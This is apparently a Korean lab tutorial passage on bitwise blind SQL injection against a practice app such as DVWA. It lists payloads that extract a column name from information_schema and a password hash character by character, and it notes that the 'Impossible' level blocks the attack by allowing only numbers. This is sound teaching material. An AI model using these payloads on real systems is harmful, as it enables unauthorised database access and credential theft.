1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&1=1#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&2=2#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&4=4#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&8=8#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&16=16#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&32=32#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&64=64#
16, 32, 64 -> 112 -> p

논리 연산의 결과를 보면 ascii 코드 112에 해당하므로 p가 된다.

 

DATA 확인하기

select password from users limit 0,1

확인해 볼 데이터가 password 컬럼의 첫번째 데이터이고, 해당 값이 5f4dcc3b5aa765d61d8327deb882cf99임을 알고 있다. 첫 글자에 대하여 5가 나오는지 확인해본다.

1' and ascii(substr((select password from users limit 0,1),1,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),1,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),1,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),1,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),1,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),1,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),1,1))&64=64#
1, 4, 16, 32 -> 53 -> 5

논리 연산의 결과를 보면 ascii 코드 53에 해당하므로 5가 된다.

---

Security Level: Impossible

Impossible 레벨의 경우 입력 값에 대하여 숫자만 입력 가능하도록 했기 때문에, SQL Injection이 불가능하다.

---

질문 환영, 수정 및 보완에 대한 지적 환영